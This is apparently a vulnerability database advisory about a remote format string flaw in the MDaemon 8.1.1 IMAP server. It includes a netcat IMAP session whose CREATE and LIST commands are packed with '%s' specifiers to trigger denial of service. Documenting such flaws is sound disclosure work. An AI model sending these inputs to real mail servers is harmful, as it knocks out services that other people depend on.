|
Alt-N MDaemon IMAP Server Remote Format String Vulnerability
The following IMAP sequence is sufficient to demonstrate causing a denial of service condition: M:\Distrib\nc>nc -v 127.0.0.1 143 Blaster [127.0.0.1] 143 (imap) open * OK hack.com IMAP4rev1 MDaemon 8.1.1 ready 0001 LOGIN "user" "password" 0001 OK LOGIN completed 0003 CREATE "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s" 0003 OK CREATE completed 0004 LIST "%s%s%s%s%s%s%s" "%s" Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>. |
|
|
Privacy Statement |
